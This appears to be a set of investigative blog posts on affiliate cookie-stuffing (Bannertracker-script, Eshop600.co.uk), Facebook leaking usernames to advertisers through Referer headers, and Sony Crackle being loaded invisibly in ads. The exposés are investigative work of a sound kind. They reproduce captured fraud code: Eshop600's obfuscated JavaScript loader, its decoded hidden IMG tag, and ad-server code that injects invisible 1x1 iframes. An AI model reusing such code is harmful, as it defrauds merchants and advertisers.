Using multiple IDs raises a further risk for Bannertracker-script: A diligent investigator might request the Bannertracker-script site repeatedly in order to attempt to learn most or all of Bannertracker-script’s IDs. Bannertracker-script attempted to reduce this risk via server-side logic to avoid serving the same user with two different ID’s, based on variables that seem to include client IP address, HTTP User-agent header, and more.

In principle, investigators might recognize Bannertracker-script by its distinctive domain name. But in fact we have seen this perpetrator also using other domain names. (We refer to the perpetrator as Bannertracker-script because that was the first such domain we found and, in our testing, still the most frequent.)

Affected Merchants

To date, we have primarily seen Bannertracker-script targeting Amazon. But other merchants are vulnerable to similar attacks that drop a large number of cookies invisibly in hopes that users make purchases from the corresponding merchants. In this regard, large merchants are particularly vulnerable: The more popular a merchant is, the greater the likelihood of a given user making a purchase from that merchant in a given time period. Indeed, we have also seen Bannertracker-script using the same technique to drop cookies for several adult web sites

Amazon’s exposure is somewhat reduced by its 24-hour affiliate commission window — paying commission to affiliates only on a user’s purchases within 24 hours of invocation of an affiliate link, whereas other merchants often grant credit for as long as 30 days. But Amazon’s large and growing popularity limits the effectiveness of this measure. Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. If Bannertracker-script can deposit one million Amazon cookies, via hacks of multiple popular sites, it will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents — substantial revenue, particularly given the prospect of hacking other vulnerable web sites. Ordinarily, one might expect Amazon to notice a new affiliate with a large spike in earnings. But by spreading its commissions across hundreds of affiliate accounts, Bannertracker-script may avoid or deflect such scrutiny.

We have reported this matter to our contacts at Amazon and will update this post with any information Amazon cares to share.

Large-Scale Cookie-Stuffing at Eshop600.co.uk with Wesley Brandi

We have recently been testing web sites that drop affiliate cookies invisibly — claiming to have referred users to the corresponding merchants’ sites, when in fact users never asked to visit the merchants’ sites and never saw the merchants’ sites. Nonetheless, through invisible IFRAMEs, invisible IMG tags, and similar constructs, these pages manage to set affiliate cookies indicating that referrals occurred. Then, if users happen to make purchases from the targeted merchants, the cookie-stuffers collect affiliate commissions. With commissions as large as 40%, this tactic can be lucrative.

One large offender we recently found: Eshop600.co.uk. In automated and manual testing, we found 36 pages on the Eshop600 site, including the site’s home page, which drop dozens of cookies invisibly. To a user glancing at a web browser, the Eshop600 site looks perfectly normal:

The Eshop600 site

But within the affected Eshop600 pages are 26 blocks of encoded JavaScript code. An example:

var i,y,x="3c696d672069643d22706963333722207372633d22....";y="";var _0x70c3=["x6Cx65x6Ex67x74x68","x25","x73x75x62x73x74x72","x77x72x69x74x65"];for(i=0;i<x[_0x70c3[0]];i+=2){ y+=unescape(_0x70c3[1]+x[_0x70c3[2]](i,2));} ;document[_0x70c3[3]](y);

We decoded this JavaScript to find an invisible IMG tag.

<img width="75" height="100" id="pic37" style="display: none;" alt=" " src="http://www.tkqlhce.com/click-3910892-5590799"/>

Note the CSS STYLE of display:none (yellow highlighting) which makes the entire tag invisible. In any event, the 75×100 size (green highlighting) is too small to load a genuine web page. Nonetheless, a trace of the redirect sequence shows that the IMG does indeed redirect through an affiliate network (ValueClick’s Commission Junction) (red) and on to an affiliate merchant (blue).

GET /click-3910892-5590799 HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateHost: www.tkqlhce.comConnection: Keep-AliveHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.tkqlhce.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:02 GMTLocation: http://www.apmebf.com/oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB<Content-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:01 GMT---GET /oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.apmebf.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:07 GMTLocation: http://www.kdukvh.com/rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm<Set-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTSet-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:07 GMT---GET /rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.kdukvh.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.kdukvh.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:18 GMTLocation: http://www.argos.co.uk/webapp/wcs/stores/servlet/ArgosCreateReferral?storeId=10001&referrer=COJUN&cmpid=COJUN&referredURL=&_%24ja=tsid%3A11674%7Cprd%3A3910892Set-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: PBLP=849260:3910892:1327883178648:cjo; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:18 GMT

Of course www.argos.co.uk is just one of dozens of merchants affected. Below are 26 merchants we’ve found targeted by Eshop600, including merchants using affiliate networks Affiliate Window (AW), Commission Junction (CJ), TradeDoubler (TD), and Perfiliate (now owned by Affiliate Window).

direct.asda.com (AW) www.britishairways.com (AW)
www.dorothyperkins.com (AW) www.screwfix.com (AW)
groceries.asda.com (Perfiliate) www.burton.co.uk (AW)
www.evans.co.uk (AW) www.sky.com (AW)
phone-shop.tesco.com (TD) www.comet.co.uk (AW)
www.halfords.com (AW) www.tesco.com (TD)
store.three.co.uk (Perfiliate) www.currys.co.uk (AW)
www.hsamuel.co.uk (AW) www.vodafone.co.uk (AW)
www.annsummers.com (AW) www.debenhams.com (AW)
www.johnlewis.com (AW) www.wilkinsonplus.com (AW)
www.argos.co.uk (CJ) www.dixons.co.uk (AW)
www.missselfridge.com (AW) www.asda.co.uk (Perfiliate)
www.diy.com (AW) www.pcworld.co.uk (AW)  

Beyond encoded JavaScript, Eshop600 also tried other methods to avoid detection. Load an Eshop600 page repeatedly, and it won’t stuff cookies every time; the site is clearly attempting to recognize repeat visitors to avoid restuffing the same users more than once. That makes Eshop600’s practice harder to replicate (an extra challenge for anyone trying to prove an infraction) and helps reduce telltale signs in merchants’ logs.

On one view, these practices are nothing new: Ben has been writing these up since 2004. But affiliate merchants and networks need to remain vigilant to catch these cheaters. We’re finding many dozens of affiliate cookie-stuffers per month, along with other rogue affiliates using spyware/adware, typosquatting, and more. It’s not unusual for cheaters to be among a merchants’ largest affiliates; for example, the 2010 indictment of Shawn Hogan alleges that he was the single largest affiliate in eBay’s affiliate program in 2006-2007, collecting more than $15 million over 18 months. Now, most affiliate programs are far smaller than eBay’s, yielding a correspondingly lower opportunity for fraud. But for mid-sized merchants, there are typically large savings in catching and ejecting all rule-breakers.

Apple in-app purchase litigation

I served as cocounsel in class action litigation challenging Apple charging users for purchases made by kids, refusing refunds to such users, and allowing purchases (and charging users’ credit cards) without users reentering their passwords to authorize the purchases.  In response, Apple agreed to grant refunds to customers who so requested.

In Re In-App Purchase Litigation, Case No. 5:11-CV-01758-EJD (N.D. Cal.)

Case docket including consolidated class action complaint

Hard-Coding Bias in Google “Algorithmic” Search Results

I present categories of searches for which available evidence indicates Google has “hard-coded” its own links to appear at the top of algorithmic search results, and I offer a methodology for detecting certain kinds of tampering by comparing Google results for similar searches. I compare Google’s hard-coded results with Google’s public statements and promises, including a dozen denials but at least one admission. I conclude by analyzing the impact of Google’s tampering on users and competition, and by proposing principles to block Google’s bias.

Details, including screenshots, methodology, proposed regulatory response, and analogues in other industries:

Hard-Coding Bias in Google “Algorithmic” Search Results

Facebook Leaks Usernames, User IDs, and Personal Details to Advertisers updated May 26, 2010

Browse Facebook, and you wouldn’t expect Facebook’s advertisers to learn who you are. After all, Facebook’s privacy policy and blog posts promise not to share user data with advertisers except when users grant specific permission. For example, on April 6, 2010 Facebook’s Barry Schnitt promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.”

My findings are exactly the contrary: Merely clicking an advertiser’s ad reveals to the advertiser the user’s Facebook username or user ID. With default privacy settings, the advertiser can then see almost all of a user’s activity on Facebook, including name, photos, friends, and more.

In this article, I show examples of Facebook’s data leaks. I compare these leaks to Facebook’s privacy promises, and I point out that Facebook has been on notice of this problem for at least eight months. I conclude with specific suggestions for Facebook to fix this problem and prevent its reoccurrence.

Details of the Data Leak

Facebook’s data leak is straightforward: Consider a user who clicks a Facebook advertisement while viewing her own Facebook profile, or while viewing a page linked from her profile (e.g. a friend’s profile or a photo). Upon such a click, Facebook provides the advertiser with the user’s Facebook username or user ID.

Facebook leaks usernames and user IDs to advertisers because Facebook embeds usernames and user IDs in URLs which are passed to advertisers through the HTTP Referer header. For example, my Facebook profile URL is http://www.facebook.com/bedelman. Notice my username (yellow).

Of course, it would be incorrect to assume that a person looking at a given profile is in fact the owner of that profile. A request for a given profile might reflect that user looking at her own profile, but it might instead be some other user looking at the user’s profile. However, when a user views her own profile page, Facebook automatically embeds a “profile” tag (green) in the URL:

http://www.facebook.com/bedelman?ref=profile

Furthermore, when a user clicks from her profile page to another page, the resulting URL still bears the user’s own user ID or username, along with the details of the later-requested page. For example, when I view a friend’s profile, the resulting URL is as shown below. Notice the continued reference to my username (yellow) and the fact that this is indeed my profile (green), along with an appendage naming the user whose page I am now viewing (blue).

http://www.facebook.com/bedelman?ref=profile#!/pacoles

Each of these URLs is passed to advertisers whenever a user clicks an ad on Facebook. For example, when I clicked a Livingsocial ad on my own profile page, Facebook redirected me to the advertiser, yielding the following traffic to the advertiser’s server. Notice the transmission in the Referer header (red) of my username (yellow) and the fact that I was viewing my own profile page (green).

GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_ 1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile

Host: livingsocial.com

The same transmission occurs when a user clicks from her profile page to a friend’s page. For example, I clicked through to a friend’s profile, http://www.facebook.com/bedelman?ref=profile#!/pacoles, where I clicked another Livingsocial ad. Again, Facebook’s redirect caused my browser to transmit in its Referer header (red) my username (yellow), the fact that that username reflects my personal profile (green). Interestingly, my friend’s username was omitted from the transmission because it occurred after a pound sign, causing it to be automatically removed from Referer transmission.

GET /deals/socialads_reflector?do_not_redirect=1&preferred_city=152&ref=AUTO_LOWE_Deals_ 1273608790_uniq_bt1_b100_oci123_gM_a21-99 HTTP/1.1
Accept: */*
Referer: http://www.facebook.com/bedelman?ref=profile

Host: livingsocial.com

In further testing, I confirmed that the same transmission occurs when a user clicks from her profile page to a photo page, or to any of various other pages linked form a user’s profile.

With a Facebook member’s username or user ID, current Facebook defaults allow an advertiser (and anyone else) to obtain a user’s name, gender, other profile data, picture, friends, networks, wall posts, photos, and likes. Furthermore, the advertiser already knows the user’s basic demographics, since the advertiser knows the user fits the profile the advertiser had requested from Facebook. For example, in grey highlighting above, the advertiser learned from Facebook my age, gender, and geographic location.

Facebook’s Contrary Statements about User Privacy vis-a-vis Advertisers

Facebook has made specific promises as to what information it will share with advertisers. For one, Facebook’s privacy policy promises “we do not share your information with advertisers without your consent” (section 5). Then, in section 7, Facebook lists eleven specific circumstances in which it may share information with others — but none of these circumstances applies to the transmission detailed above.

Facebook’s recent blog postings also deny that Facebook shares users’ identities with advertisers. In an April 6, 2010 post, Facebook promised: “We don’t share your information with advertisers unless you tell us to (e.g. to get a sample, hear more, or enter a contest). Any assertion to the contrary is false. Period.” Facebook’s prior postings were similar. July 1, 2009: “Facebook does not share personal information with advertisers except under the direction and control of a user. … You can feel confident that Facebook will not share your personal information with advertisers unless and until you want to share that information.” December 9, 2009: “Facebook never shares personal information with advertisers except under your direction and control.” As to all these claims, I disagree. Sharing a username or user ID upon a single click, without any disclosure or indication that such information will be shared, is not at a user’s direction and control.

Facebook Has Been on Notice of This Problem for Eight Months

AT&T Labs researcher Balachander Krishnamurthy and Worcester Polytechnic Instituteprofessor Craig Wills previously identified the general problem of social networks leaking user information to advertisers, including leakage through the Referer headers detailed above. In August 2009, their On the Leakage of Personally Identifiable Information Via Online Social Networks was posted to the web and presented at the Workshop on Online Social Networks (WOSN).

Through Krishnamurthy and Wills’ research, Facebook eight months ago received actual notice of the data leakage at issue. A September 2009 MediaPost article confirms Facebook’s knowledge through it spokesperson’s response. However, Facebook spokesperson Simon Axten severely understated the severity of the data leak: Axten commented “The average Facebook user views a number of different profile pages over the course of a session …. It’s thus difficult for a tracking website to know whether the identifier belongs to the person being tracked, or whether it instead belongs to a friend or someone else whose profile that person is viewing.” I emphatically disagree. As shown above, when a user views her own profile, or a page linked from her own profile, the “?ref=profile” tag is added to the URL — exactly confirming the identity of the profile owner.

What Facebook Should Do

Since receiving actual notice of these data leaks, Facebook has implemented scores of new features for advertising, monetization, information-sharing, and reorganization. Inexplicably, Facebook has failed to address leakage of user information to advertisers. That’s ill-advised and short-sighted: Users don’t expect ad clicks to reveal their names and details, and Facebook’s privacy policy and blog posts promise to honor that expectation. So Facebook needs to adjust its actual practices to meet its promises.

Preventing advertisers from receiving usernames and user IDs is strikingly straightforward: A modified redirect can mask referring URLs. Currently, Facebook uses a simple HTTP 301 redirect, which preserves referring URLs — exactly creating the problem detailed above. But a FORM POST redirect, META REFRESH redirect, or JavaScript redirect could conceal referring URLs — preventing advertisers from receiving username or user ID information.

Instead, Facebook has partially implemented the pound sign method described above — putting some, but not all, sensitive information after a pound sign, with the result that sometimes this information is not transmitted as a Referer. If fully implemented across the Facebook site, this approach might prevent the data leakage I uncovered. However, in my testing, numerous within-Facebook links bypass the pound sign masking. In any event, an improved redirect would be much simpler to implement — requiring only a single adjustment to the ad click-redirect script, rather than requiring changes to URL formats across the Facebook site.

Finally, Facebook should inform users of what has occurred. Facebook should apologize to users, explain why it didn’t live up to its explicit privacy commitments, and establish procedures — at least robust testing, if not full external review — to assure that users’ privacy is correctly protected in the future.

Update – May 26, 2010

On May 20, 2010, the Wall Street Journal reported the problem detailed above. On or about that same day, Facebook removed the ref=profile tags that were the crux of the data leak.

I yesterday spoke with Arturo Bejar, a Facebook engineer who investigated this problem. Arturo told me that after Krishnamurthy and Wills’ article, he reviewed relevant Facebook systems in search of leakage of user information. At that time, he found none, in that Facebook revealed the URLs users were browsing when they clicked ads, but did not indicate whether the user clicking a given ad was in fact the owner of the profile showing that ad. However, in a subsequent Facebook redesign, beginning in February 2010, Facebook user home pages received a new “profile” button which carried the ref=profile URL tags I analyze above. Because this tag was added without a further privacy review, Arturo tells me that he and others at Facebook did not consider the interaction between this tag and the problem I describe above. Arturo says that’s why this problem occurred despite the prior Krishnamurthy and Wills article.

Arturo also pointed out that the problem I describe did not affect advertisers whose landing pages were pages on Facebook (rather than advertisers’ own external sites).

Meanwhile, Facebook’s May 24 “Protecting Privacy with Referrers” presents Facebook’s view of the problem in greater detail. Facebook’s posting offers a fine analysis of the various methods of redirects and Facebook’s choice among them. It’s worth a read.

After discussing the problem with Arturo and reading Facebook’s new post, I reached a more favorable impression of Facebook’s response. But my view is tempered by Facebook’s ill-advised attempts to downplay the breach.

  • Rather than affirmatively describing the specific design flaw, Facebook’s post describes what “could” “potentially” occur. Facebook’s post never gives a clear affirmative statement of the problem.
  • Facebook says advertisers would need to “infer” a user’s username/ID. But usernames and IDs are sent directly, in clear and unambiguous URLs, hardly requiring complex analysis
  • Facebook claims that the breach affected only “one case … if a user takes a specific route on the site” (WSJ quote). Facebook also calls the problem “a rarely occurring case” (posting). I dispute these characterizations. It is hardly “rare” for a user to view her own profile. To view her own profile and click an ad? There’s no reason to think that’s any less frequent than clicking an ad elsewhere. To view her own profile, click through to another page, and then click an ad? That’s perfectly standard. Furthermore, although Facebook told the Journal there is “one case” in which data is leaked improperly, in fact I’ve found many such cases including clicking from profile to ad, from profile to friend’s page to ad, and from profile to photo page to ad, to name three.
  • Through transmission in HTTP Referer headers, usernames and IDs appears reach advertisers’ web servers in a manner such that default server log files would store this data indefinitely, and default analytics would tabulate it accordingly. Facebook says it has “no reason to believe that any advertisers were exploiting” the data breach I reported, but the fact is, this data ends up in a place where advertisers could (and, as to historic data, still can) access it easily, using standard tools, and at their convenience.
  • Although Facebook’s post says the problem is “potential,” I found that a user’s username/ID is sent with each and every click in the affected circumstances.

So the problem was substantial, real, and immediate. Facebook errs in suggesting the contrary.

Sony’s Crackle: Invisible Traffic Galore

Advertisers buying display ads from Sony’s Crackle.com rightly and reasonably expect that users can see the ads. After all, a visible ad is a basic and crucial condition for effective display advertising: If a user can’t see ad, then the impression is wasted, as is the associated spending. Nonetheless, in a surprising series of incidents, numerous Crackle partners are loading the Crackle site invisibly — thereby overcharging advertisers for worthless invisible impressions.

Below, I present three recent examples of Crackle partners loading the Crackle site invisibly, largely via 1×1 IFRAMEs. I then tabulate observations preserved by my automation, demonstrating that Crackle’s tainted traffic has continued for more than a year. I conclude by flagging implications for traffic measurement and ad pricing, and by suggesting what Crackle should do to clean up this mess.

Example 1: Yahoo Right Media, Adjuggler Invisible (1×1) IFRAME Loads Crackle Invisibly

In testing of April 24, 2010, my Automatic Spyware Advertising Tester browsed a series of ad URLs I had previously observed to be loaded by various spyware (installed through security exploits without user consent). One such URL embedded Bcserving tags for a 160×600 IFRAME, which passed traffic through Yahoo Right Media (yellow) to Adjuggler (green). Crucially, Adjuggler responded with an invisible 1×1 IFRAME (red) loading a URL on the Crackle site (blue). Meanwhile, another 1×1 IFRAME loaded competing video site Buddytv (grey).

GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=1292398882782181&nc=26008239 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgAcAAoAAAAAAP8AAAAHGBe4GAAAAAA
ANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIAAgAAAAAAXI.C9Shczz
9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJXq7VaJccC
LvQxO2LYSYeejv1pj-PofdqHVgeAAAAAA==,,…,4256ee3e-5018-11df-ace3-001e6837e93f
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_185B9A7222F0F2E13794DA5C=a; ajcmp=2023xkW0101Em0039kn

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Sun, 25 Apr 2010 03:11:36 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript

document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC= “http://search.dailygamingupdates.com/ioq1wEIC6YxRSnWiIC9BHpdX0b1i.html”><“+”/IFRAME><“+”br><“+”/br>n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=1 HEIGHT=1 SRC=”http://crackle.com/c/A_River_Runs_Through_It/?cmpid=762“><“+”/IFRAME><“+”br><“+”/br>n”);
document.write(“n”);
document.write(“<“+”iframe src=”http://www.buddytv.com/home2/american-idol-home2.aspxwidth=”1″ height=”1″ scrolling=”no” frameborder=”0″ marginheight=”0″ marginwidth=”0″><“+”/iframe>”);

The net effect was to load the Crackle site completely invisibly. The page-load also embedded tracking tags for comScore/ScorecardResearch (yellow). Unless comScore takes special steps to recognize and discount these invisible loads of the Crackle site, the presence of these tags would cause comScore services to overstate Crackle’s popularity.

<script type=”text/javascript”>
document.write(unescape(“%3Cscript src='” + (document.location.protocol == “https:” ? “https://sb” : “http://b”) + “.scorecardresearch.com/beacon.js’ %3E%3C/script%3E”));
</script>

<script type=”text/javascript”>
COMSCORE.beacon({
c1: 2,
c2: 6035898,
c3: “”,
c4: “Crackle.com”,
c5: “030224”,
c6: “”,
c15: “”
});
</script>

Example 2: Yahoo Right Media, Adjuggler, Media Javelin Overflowing IFRAME (1280×800 inside 160×600) Loads Crackle Invisibly

In testing of April 14, 2010, my tester browsed another publisher passing traffic through Yahoo Right Media (yellow) to an ad on Adjuggler (green) with a HTML comment referencing Media Javelin (pink). The placement was purportedly a 160×600 (grey), yet the response included a further 160×600 ad (completely filling the available space) (grey) followed by three 1280×800 IFRAMEs (red). The third of these IFRAMEs passed traffic to an Adspeed URL (orange) which passed traffic to Crackle (blue).

GET /servlet/ajrotator/875404/0/vj?z=pdn&dim=753182&pos=1&pv=9001545836619459&nc=92606617 HTTP/1.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAEAh e4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAAAAIA AgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: rotator.adjuggler.com
Connection: Keep-Alive
Cookie: optin=Aa; ajess1_…=a; ajcmp=…

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Wed, 14 Apr 2010 05:43:20 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref=”http://rotator.adjuggler.com:80/p3p/RotatorPolicyRef.xml”, CP=”NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC”
Content-Type: application/x-javascript
Set-Cookie: ajcmp=…;Max-Age=315360000;expires=Sat, 11 Apr 2020 05:43:20 GMT;Path=/

document.write(“<“+”!– BEGIN STANDARD TAG – 160 x 600Mediajavelin.com: Run-of-site – DO NOT MODIFY –>n”);
document.write(“<“+”IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=160 HEIGHT=600 SRC=”http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=1024×800&section=820955“><“+”/IFRAME>n”);
document.write(“<“+”!– END TAG –>n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_home_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82609&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82609&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Buddy_idol_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82610&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82610&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“n”);
document.write(“n”);
document.write(“n”);
document.write(“<“+”!– AdSpeed.com Serving Code 7.9.4 for [Ad] Crackle_blood_cpc 1280×800 –><“+”iframe width=”1280″ height=”800″ src=”http://g.adspeed.net/ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top” frameborder=”0″ scrolling=”no” allowtransparency=”true” hspace=”0″ vspace=”0″><“+”img style=”border:0px;” src=”http://g.adspeed.net/ad.php?do=img&aid=82611&wd=1280&ht=800&pair=as” width=”1280″ height=”800″/><“+”/iframe><“+”!– AdSpeed.com End –>n”);
document.write(“”);

GET /ad.php?do=html&aid=82611&wd=1280&ht=800&target=_top HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?AAAAAJ57DABJF0gAAAAAAABnEwAAAAAAAgDkAAoAAAAAAP8AAAAE Ahe4GAAAAAAANXYaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVewYAAAAA AAIAAgAAAAAAXI.C9Shczz9cj8L1KFzPP2ZmZmZmZtY.ZmZmZmZm1j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAT0W5xeDoOCKeWj8s538mkN2SqqfrSTmyoa.sbAAAAAA==,,…
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: g.adspeed.net
Connection: Keep-Alive

HTTP/1.1 200 OK
P3P: policyref=”http://g.adspeed.net/w3c/p3p.xml”, CP=”NOI CUR ADM OUR NOR STA NID”
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Content-type: text/html
Connection: close
Transfer-Encoding: chunked
Date: Wed, 14 Apr 2010 05:43:19 GMT
Server: AdSpeed/s10

<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style=”background-color:transparent”><SCRIPT language=”JavaScript”>
<!–
window.location=”http://crackle.com/c/Blood/?cmpid=763“;
//–>
